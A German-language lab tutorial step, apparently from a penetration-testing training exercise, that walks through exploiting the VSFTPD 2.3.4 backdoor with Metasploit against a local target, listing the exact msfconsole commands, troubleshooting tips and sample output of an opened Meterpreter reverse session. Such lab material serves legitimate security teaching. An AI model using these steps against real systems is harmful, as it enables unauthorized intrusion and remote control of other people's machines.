Initialen Zugriff erlangen
In diesem Schritt verschaffen Sie sich Zugriff auf das Zielsystem, indem Sie eine Backdoor im Dienst VSFTPD 2.3.4 ausnutzen. Dies liefert Ihnen eine Meterpreter-Session für die Post-Exploitation.
Starten Sie zunächst die Metasploit Framework-Konsole.
msfconsole -q
Sobald Metasploit läuft, wählen Sie den Exploit für die VSFTPD 2.3.4 Backdoor aus.
use exploit/unix/ftp/vsftpd_234_backdoor
Konfigurieren Sie nun die Ziel- und Payload-Optionen. Da der Dienst auf derselben Maschine läuft, verwenden wir die Loopback-IP. Die Standard-Payload erfordert LHOST und schlägt möglicherweise mit der Meldung "All encoders failed to encode" fehl – setzen Sie den Encoder, um dies zu vermeiden:
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
Starten Sie abschließend den Exploit.
exploit
FEHLERBEHEBUNG: Falls Sie Msf::OptionValidateError One or more options failed to validate: LHOST sehen, führen Sie set LHOST 127.0.0.1 aus. Falls Sie All encoders failed to encode sehen, führen Sie set Encoder generic/none aus. Führen Sie danach erneut exploit aus.
WARNUNG: Der erste Versuch könnte mit "Unable to connect to backdoor on 6200/TCP. Cooldown?" oder "Exploit completed, but no session was created." fehlschlagen. Sollte dies passieren, führen Sie einfach erneut den Befehl exploit aus – der zweite Versuch sollte erfolgreich sein.
Bei Erfolg wird eine Meterpreter-Session geöffnet (Session 1).
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Sie verfügen nun über eine Meterpreter-Session. Um für den nächsten Schritt zum msf > Prompt zurückzukehren, drücken Sie Ctrl+Z und geben Sie bei der Frage "Background session 1?" ein y ein.